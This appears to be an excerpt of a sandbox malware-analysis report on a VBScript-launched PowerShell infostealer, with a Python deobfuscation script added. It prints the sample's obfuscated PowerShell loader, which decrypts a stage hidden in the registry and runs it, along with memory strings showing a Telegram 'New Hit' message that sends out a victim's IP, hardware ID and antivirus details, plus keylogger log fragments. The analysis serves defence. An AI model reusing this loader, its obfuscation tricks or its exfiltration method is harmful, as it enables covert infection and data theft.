                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "& {function irujv([byte[]]$f9mpx) {invoke-expression -verbose -debug -informationaction ignore 'zzo$zzoszzofzzoyzzoszzo9zzo=zzo[zzoszzoyzzoszzotzzoezzomzzo.zzotzzoezzoxzzotzzo.zzoezzonzzoczzoozzodzzoizzonzzogzzo]zzo:zzo:zzouzzotzzofzzo8zzo.zzogzzoezzotzzoszzotzzorzzoizzonzzogzzo(zzo$zzofzzo9zzomzzopzzoxzzo)zzo'.replace('zzo', ''); return $sfys9; } function ssyta([byte[]]$mydkv) {invoke-expression -warningaction inquire -verbose 'rzw$rzwgrzwwrzw1rzwmrzwhrzw=rzw[rzwbrzwirzwtrzwcrzworzwnrzwvrzwerzwrrzwtrzwerzwrrzw]rzw:rzw:rzwtrzworzwirzwnrzwtrzw3rzw2rzw(rzw$rzwmrzwyrzwdrzwkrzwvrzw,rzw0rzw)rzw;rzw'.replace('rzw', ''); return $gw1mh; } $mxypq = irujv(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61); $lsxmg = irujv(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d); $gyqop = irujv(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73); $qr3m4 = irujv(0x4a, 0x6d, 106, 53, 121); $q21ag = irujv(0x67, 0x69, 69, 99, 67); $u2okr = ssyta(0x00, 0, 0, 0x00); $dxs3r = $true; $gns0e = $null; function juypb($gsles) {invoke-expression -debug -warningaction inquire 'fs5$fs5wfs5gfs52fs5gfs5lfs5=fs5[fs5sfs5yfs5sfs5tfs5efs5mfs5.fs5sfs5efs5cfs5ufs5rfs5ifs5tfs5yfs5.fs5cfs5rfs5yfs5pfs5tfs5ofs5gfs5rfs5afs5pfs5hfs5yfs5.fs5afs5efs5sfs5]fs5:fs5:fs5cfs5rfs5efs5afs5tfs5efs5(fs5)fs5'.replace('fs5', ''); invoke-expression -informationaction ignore -warningaction inquire -debug -verbose 
'hta$htawhtaghta2htaghtalhta.htamhtaohtadhtaehta=hta[htashtayhtashtathtaehtamhta.htashtaehtachtauhtarhtaihtathtayhta.htachtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htachtaihtaphtahhtaehtarhtamhtaohtadhtaehta]hta:hta:htachtabhtachta'.replace('hta', ''); invoke-expression -debug -informationaction ignore -warningaction inquire 'rly$rlywrlygrly2rlygrlylrly.rlyprlyarlydrlydrlyirlynrlygrly=rly[rlysrlyyrlysrlytrlyerlymrly.rlysrlyerlycrlyurlyrrlyirlytrlyyrly.rlycrlyrrlyyrlyprlytrlyorlygrlyrrlyarlyprlyhrlyyrly.rlyprlyarlydrlydrlyirlynrlygrlymrlyorlydrlyerly]rly:rly:rlyprlykrlycrlysrly7rly'.replace('rly', ''); invoke-expression -warningaction inquire -verbose 'mng$mngwmnggmng2mnggmnglmng.mngkmngemngymng=mng[mngsmngymngsmngtmngemngmmng.mngcmngomngnmngvmngemngrmngtmng]mng:mng:mngfmngrmngomngmmngbmngamngsmngemng6mng4mngsmngtmngrmngimngnmnggmng(mng$mngmmngxmngymngpmngqmng)mng'.replace('mng', ''); invoke-expression -informationaction ignore -warningaction inquire 'bnk$bnkwbnkgbnk2bnkgbnklbnk.bnkibnkvbnk=bnk[bnksbnkybnksbnktbnkebnkmbnk.bnkcbnkobnknbnkvbnkebnkrbnktbnk]bnk:bnk:bnkfbnkrbnkobnkmbnkbbnkabnksbnkebnk6bnk4bnksbnktbnkrbnkibnknbnkgbnk(bnk$bnklJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe -command "& {function it93g([byte[]]$e3oxu) {invoke-expression -debug -verbose 'h6m$h6mwh6mhh6mbh6m3h6m2h6m=h6m[h6msh6myh6msh6mth6meh6mmh6m.h6mth6meh6mxh6mth6m.h6meh6mnh6mch6moh6mdh6mih6mnh6mgh6m]h6m:h6m:h6muh6mth6mfh6m8h6m.h6mgh6meh6mth6msh6mth6mrh6mih6mnh6mgh6m(h6m$h6meh6m3h6moh6mxh6muh6m)h6m'.replace('h6m', ''); return $whb32; } function tiw6l([byte[]]$zuv5n) {invoke-expression -debug -warningaction inquire -verbose -informationaction ignore 'dtc$dtcqdtckdtcadtcgdtcidtc=dtc[dtcbdtcidtctdtccdtcodtcndtcvdtcedtcrdtctdtcedtcrdtc]dtc:dtc:dtctdtcodtcidtcndtctdtc3dtc2dtc(dtc$dtczdtcudtcvdtc5dtcndtc,dtc0dtc)dtc;dtc'.replace('dtc', ''); return $qkagi; } $h2oux = it93g(0x74<#agf8g#>,0x52<#sotvh#>,0x6b<#ijtfo#>,0x58<#aq0ez#>,0x43<#lryb0#>,0x36<#ldjca#>,0x6a<#drhtq#>,0x2b<#nxos5#>,0x34<#ajnvw#>,0x5a<#vkssp#>,0x6f<#nr7dj#>,0x52<#lsoi1#>,0x59<#pervd#>,0x62<#tlapz#>,0x79<#kbijz#>,0x47<#hncf5#>,0x70<#hu1xu#>,0x6f<#tuejh#>,0x4d<#cjg0h#>,0x45<#w2r2e#>,0x75<#qkdti#>,0x6b<#ljyd9#>,0x6b<#epinn#>,0x43<#yn4lf#>,0x59<#bh0r2#>,0x46<#bfrbe#>,0x42<#owjkm#>,0x51<#d0ipg#>,0x34<#pgajc#>,0x2f<#oktmn#>,0x46<#k7qw7#>,0x79<#ntwba#>,0x64<#lrwjs#>,0x34<#lp8kk#>,0x58<#gppfr#>,0x4f<#zhqok#>,0x4b<#xlpyw#>,0x4e<#qpxm0#>,0x58<#qdhox#>,0x78<#bubbt#>,0x2b<#gmsca#>,0x45<#csle7#>,0x67<#ldi0e#>,0x3d<#bmxwz#>); $qbags = it93g(0x4e<#c2vu0#>,0x47<#diarv#>,0x30<#mgpf7#>,0x52<#qdmxt#>,0x63<#aesom#>,0x50<#nfqkq#>,0x37<#uwobq#>,0x49<#mq8mb#>,0x36<#z2tts#>,0x7a<#gxc3u#>,0x75<#dzacy#>,0x45<#yjqhj#>,0x65<#drqb2#>,0x65<#tbnzn#>,0x6f<#cek6p#>,0x32<#hvj6e#>,0x46<#ycxzm#>,0x6f<#ywlmr#>,0x77<#ik0cx#>,0x72<#kls1z#>,0x34<#jknpr#>,0x51<#dzexq#>,0x3d<#kaung#>,0x3d<#f40yy#>); $zxcf8 = 
it93g(0x53<#b0lhd#>,0x6f<#ynhic#>,0x66<#bdsgx#>,0x74<#tossn#>,0x77<#hrywf#>,0x61<#i0n5w#>,0x72<#pudct#>,0x65<#r8glo#>,0x5c<#wrgut#>,0x4d<#lrnzo#>,0x69<#smhlu#>,0x63<#lcpm3#>,0x72<#galvu#>,0x6f<#oapw7#>,0x73<#uiger#>,0x6f<#svdmv#>,0x66<#tmxra#>,0x74<#enrsf#>,0x5c<#qtdsl#>,0x57<#aqua7#>,0x69<#lc02u#>,0x6e<#lgnex#>,0x64<#x9m0b#>,0x6f<#vc3vo#>,0x77<#htgri#>,0x73<#ioy3l#>); $hbkvc = it93g(0x73<#jbcod#>,0x31<#rvfxn#>,0x55<#zawun#>,0x6e<#qhnrl#>,0x62<#ywzwy#>); $b8dta = tiw6l(0x00<#a7hb6#>,0x00<#o0rd9#>,0x00<#jxcyj#>,0x00<#om184#>); $isxcm = tiw6l(0x45<#ood4n#>,0x00<#imgsk#>,0x00<#ylexb#>,0x00<#uuo0e#>); $l8xqf = tiw6l(0x03<#cqs75#>,0x00<#gs7w6#>,0x00<#gtblr#>,0x00<#o3nyw#>); $kzu3x = $null; function s2qwv($ti34n) {invoke-expression -verbose -debug -warningaction inquire 'bqr$bqrebqrlbqrpbqrtbqrfbqr=bqr[bqrsbqrybqrsbqrtbqrebqrmbqr.bqrsbqrebqrcbqrubqrrbqribqrtbqrybqr.bqrcbqrrbqrybqrpbqrtbqrobqrgbqrrbqrabqrpbqrhbqrybqr.bqrabqrebqrsbqr]bqr:bqr:bqrcbqrrbqrebqrabqrtbqrebqr(bqr)bqr;bqr'.replace('bqr', ''); invoke-expression -warningaction inquire -debug -informationaction ignore 'l3m$l3mel3mll3mpl3mtl3mfl3m.l3mml3mol3mdl3mel3m=l3m[l3msl3myl3msl3mtl3mel3mml3m.l3msl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mcl3mrl3myl3mpl3mtl3mol3mgl3mrJump to behavior
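The PowerShell command lines above stack three cheap obfuscation tricks that can be undone statically. Every statement is padded with a filler token that the script removes with `.Replace('hta', '')` just before `Invoke-Expression`; string constants are handed to a helper as byte arrays (hex or decimal, each element followed by a `<#junk#>` block comment) and rebuilt with `[System.Text.Encoding]::UTF8.GetString` or `[BitConverter]::ToInt32`; and the mshta launcher assembles the `wscript.shell` ProgID with `strreverse("llehs.tpircsw")` before pulling the next stage out of the `elnlg` value under `HKCU\Software\Microsoft\Windows` with `iex`. The script below is an added worked example, not part of the Joe Sandbox report or of the sample's own code; the function names are mine, and `SAMPLE` is spliced from the command lines quoted above and cut short so the decoded values can be checked against the report offline. The size labels it attaches to the two Base64 strings only restate what the script does with them (`$wG2gl.Key` and `$wG2gl.IV` on an `Aes` object set to CBC/PKCS7); the short names it recovers (`s1Unb` and the rest) are presumably registry value names under that key, but the truncated command lines do not show how they are used.

```python
"""Peel the obfuscation layers visible in the test.vbs process tree.

Added example, not part of the Joe Sandbox report or of the sample's own code.
Function names are mine. SAMPLE is spliced from command lines quoted in the
report and shortened, so the decoded values can be checked against it offline.
"""
import base64
import binascii
import re

# Layer 1: a filler token sits between every character of a statement and is
# removed at run time, e.g. 'H6M$H6MwH6Mh...'.Replace('H6M', '')
FILLER_RE = re.compile(r"'([^']*)'\.Replace\('([^']+)',\s*''\)", re.IGNORECASE)

# Layer 2: string constants travel as byte arrays, hex or decimal, each element
# optionally followed by a throw-away block comment: iT93g(0x74<#AgF8G#>,107,...)
NUM = r"(?:0x[0-9A-Fa-f]{1,2}|\d{1,3})(?:<#[^#]*#>)?"
BYTE_ARRAY_RE = re.compile(r"(\w+)\(\s*(" + NUM + r"(?:\s*,\s*" + NUM + r")+)\s*\)")

# Layer 3: the mshta launcher hides the ProgID behind VBScript StrReverse; the
# quotes are doubled because it sits inside an execute("...") string literal.
STRREVERSE_RE = re.compile(r'strreverse\(""([^"]*)""\)', re.IGNORECASE)

# The launcher's next stage is read from a registry value and piped to iex.
REG_STAGE_RE = re.compile(
    r"opensubkey\('([^']+)'\)\s*;\s*iex\s+\$\w+\.getvalue\('([^']+)'\)", re.IGNORECASE)

# Constructed input: fragments of the report's own command lines, joined and cut short.
SAMPLE = r"""
mshta.exe vbscript:execute("d2h=strreverse(""llehs.tpircsw""):set xar=createobject(d2h):xar.run ""powershell.exe -command $r = [microsoft.win32.registry]::currentuser.opensubkey('software\microsoft\windows'); iex $r.getvalue('elnlg')"", 0:close")
powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; }
$mxypq = irujv(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61);
$lsxmg = irujv(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d);
$gyqop = irujv(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73);
$hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>);
$iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>);
invoke-expression 'mng$mngwmnggmng2mnggmnglmng.mngkmngemngymng=mng[mngsmngymngsmngtmngemngmmng.mngcmngomngnmngvmngemngrmngtmng]mng:mng:mngfmngrmngomngmmngbmngamngsmngemng6mng4mngsmngtmngrmngimngnmnggmng(mng$mngmmngxmngymngpmngqmng)mng'.replace('mng', '');
"""


def strip_filler(text):
    """Apply each '<padded>'.Replace('<token>', '') the way .NET does: ordinal,
    case-sensitive, left to right, non-overlapping (str.replace matches that)."""
    return FILLER_RE.sub(lambda m: "'" + m.group(1).replace(m.group(2), "") + "'", text)


def undo_strreverse(text):
    """Replace StrReverse(""..."") with the literal it evaluates to."""
    return STRREVERSE_RE.sub(lambda m: '""' + m.group(1)[::-1] + '""', text)


def parse_byte_array(arglist):
    """'0x74<#AgF8G#>, 107, 0x00' -> b't', b'k', b'\\x00' ... with comments dropped."""
    cleaned = re.sub(r"<#[^#]*#>", "", arglist)
    vals = []
    for tok in cleaned.split(","):
        tok = tok.strip()
        vals.append(int(tok, 16) if tok.lower().startswith("0x") else int(tok, 10))
    return bytes(vals)


def decode_arg(blob):
    """Read a decoded array the two ways the script does: BitConverter.ToInt32
    for four bytes that are not all printable, UTF-8 text otherwise. Text that
    is valid Base64 is measured too, because the script hands two such strings
    to FromBase64String for the Aes object's .Key and .IV."""
    if len(blob) == 4 and not all(0x20 <= b < 0x7F for b in blob):
        return ("int32", int.from_bytes(blob, "little", signed=True))
    text = blob.decode("utf-8", errors="replace")
    try:
        raw = base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return ("str", text)
    if len(raw) in (16, 24, 32):        # AES IV / key sizes
        return ("base64_%d_bytes" % len(raw), text)
    return ("str", text)


def deobfuscate(cmdline):
    """Return the cleaned text, every decoded byte-array argument keyed by the
    helper it was passed to, and any (subkey, value) pair read into iex."""
    text = strip_filler(undo_strreverse(cmdline))
    arrays = {}
    for m in BYTE_ARRAY_RE.finditer(text):
        arrays.setdefault(m.group(1), []).append(decode_arg(parse_byte_array(m.group(2))))
    return {"text": text, "arrays": arrays, "registry_stage": REG_STAGE_RE.findall(text)}


if __name__ == "__main__":
    result = deobfuscate(SAMPLE)
    print(result["text"])
    for helper, args in result["arrays"].items():
        for kind, value in args:
            print(f"{helper}: {kind} {value!r}")
    print("registry stage:", result["registry_stage"])
```

Run as a file to print the cleaned statements and decoded constants; paste the full command lines from the report into `SAMPLE` to recover every constant. The filler removal is exact rather than heuristic because `str.replace` and .NET `String.Replace` share the same ordinal, left-to-right, non-overlapping semantics, so whatever PowerShell would execute is what the script prints.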
                      Source: powershell.exe, 00000008.00000002.2591788897.00000225493E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1><br>[<b>Program Manager - 16:38 UTC</b>]</p><br>
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE26F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE26FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Active Window Title: Program Manager
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F8063B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE26F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591788897.00000225493E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE2655000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ok":true,"result":{"message_id":13,"from":{"id":7813041927,"is_bot":true,"first_name":"Btc-CHAN","username":"btchanisaRobot"},"chat":{"id":-4630316859,"title":"Dex Notifications","type":"group","all_members_are_administrators":true},"date":1739291559,"photo":[{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAANzAAM2BA","file_unique_id":"AQADFMUxG90ZWFF4","file_size":1105,"width":90,"height":72},{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAANtAAM2BA","file_unique_id":"AQADFMUxG90ZWFFy","file_size":13991,"width":320,"height":256},{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAAN4AAM2BA","file_unique_id":"AQADFMUxG90ZWFF9","file_size":56772,"width":800,"height":640},{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAAN5AAM2BA","file_unique_id":"AQADFMUxG90ZWFF-","file_size":119763,"width":1280,"height":1024}],"caption":"\u2728 New Hit \ud83d\udccd IP: 8.46.123.189\n\n\ud83d\udc49 User Name: user\n\ud83d\udc49 PC Name: 783875\n\ud83c\udf0d Country: \ud83c\uddfa\ud83c\uddf8United States (US)\n\u23f1\ufe0f Current Time: 2/11/2025 11:36:35 AM\n\n\ud83d\udee1 Antivirus: Windows Defender\n\ud83c\udffe CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, 2000 MHz\n\ud83d\udda5 RAM: 4095 MB\n\u2699\ufe0f HWID: 88AE2742-2B8C-0221-A586-225B8451ACF0\n\ud83c\udfae Active Window Title: Program Manager\n\ud83d\udd53 Uptime: 0 days, 1 hours, 9 minutes","caption_entities":[{"offset":2,"length":7,"type":"bold"},{"offset":17,"length":12,"type":"url"}]}}`
                      Source: powershell.exe, 00000008.00000002.2591788897.0000022549708000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on Tuesday, 11 February 2025 16:38 UTC<br><br><style>.h { color: f76707; display: inline; }</style><p class="h"><br><br>[<b>Program Manager - 16:38 UTC</b>]</p><br><p class="h">[Win + R]</p>@
Source: powershell.exe, 00000008.00000002.2591788897.0000022549708000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: [<p class="h"><br><br>[<b>Program Manager - 16:38 UTC</b>]</p><br><p class="h">[Win + R]</p>
Source: powershell.exe, 00000006.00000002.1507861844.000001BEE2817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE2655000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"ok":true,"result":{"message_id":13,"from":{"id":7813041927,"is_bot":true,"first_name":"Btc-CHAN","username":"btchanisaRobot"},"chat":{"id":-4630316859,"title":"Dex Notifications","type":"group","all_members_are_administrators":true},"date":1739291559,"photo":[{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAANzAAM2BA","file_unique_id":"AQADFMUxG90ZWFF4","file_size":1105,"width":90,"height":72},{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAANtAAM2BA","file_unique_id":"AQADFMUxG90ZWFFy","file_size":13991,"width":320,"height":256},{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAAN4AAM2BA","file_unique_id":"AQADFMUxG90ZWFF9","file_size":56772,"width":800,"height":640},{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAAN5AAM2BA","file_unique_id":"AQADFMUxG90ZWFF-","file_size":119763,"width":1280,"height":1024}],"caption":"\u2728 New Hit \ud83d\udccd IP: 8.46.123.189\n\n\ud83d\udc49 User Name: user\n\ud83d\udc49 PC Name: 783875\n\ud83c\udf0d Country: \ud83c\uddfa\ud83c\uddf8United States (US)\n\u23f1\ufe0f Current Time: 2/11/2025 11:36:35 AM\n\n\ud83d\udee1 Antivirus: Windows Defender\n\ud83c\udffe CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, 2000 MHz\n\ud83d\udda5 RAM: 4095 MB\n\u2699\ufe0f HWID: 88AE2742-2B8C-0221-A586-225B8451ACF0\n\ud83c\udfae Active Window Title: Program Manager\n\ud83d\udd53 Uptime: 0 days, 1 hours, 9 minutes","caption_entities":[{"offset":2,"length":7,"type":"bold"},{"offset":17,"length":12,"type":"url"}]}}
Source: powershell.exe, 00000008.00000002.2591788897.0000022549708000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <style>.h { color: f76707; display: inline; }</style><p class="h"><br><br>[<b>Program Manager - 16:38 UTC</b>]</p><br><p class=
Source: powershell.exe, 00000008.00000002.2591788897.00000225493E5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: A<p class="h"><br><br>[<b>Program Manager - 16:38 UTC</b>]</p><br>
Source: powershell.exe, 00000008.00000002.2591788897.00000225493E5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager2
Source: powershell.exe, 00000008.00000002.2591788897.0000022549708000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on Tuesday, 11 February 2025 16:38 UTC<br><br><style>.h { color: f76707; display: inline; }</style><p class="h"><br><br>[<b>Program Manager - 16:38 UTC</b>]</p><br><p class="h">[Win + R]</p>
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: powershell.exe, 00000005.00000002.1372476794.0000027F8062D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: powershell.exe, 00000005.00000002.1372476794.0000027F80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F804DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F8062D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1392320209.0000027FFEAD0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: procexp.exe
Source: powershell.exe, 00000006.00000002.1594888684.000001BEFA483000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: powershell.exe, 00000006.00000002.1594888684.000001BEFA483000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Defender\MsMpeng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

                      Stealing of Sensitive Information

Source: Yara match File source: 8.2.powershell.exe.225576fb380.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.225576d3348.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.225576d3348.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2255fa80000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.225576fb380.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2800661538.000002255FA80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2741051863.00000225576FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2591788897.0000022548849000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

                      Remote Access Functionality

Source: Yara match File source: 8.2.powershell.exe.225576fb380.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.225576d3348.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.225576d3348.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2255fa80000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.225576fb380.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2800661538.000002255FA80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2741051863.00000225576FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2591788897.0000022548849000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
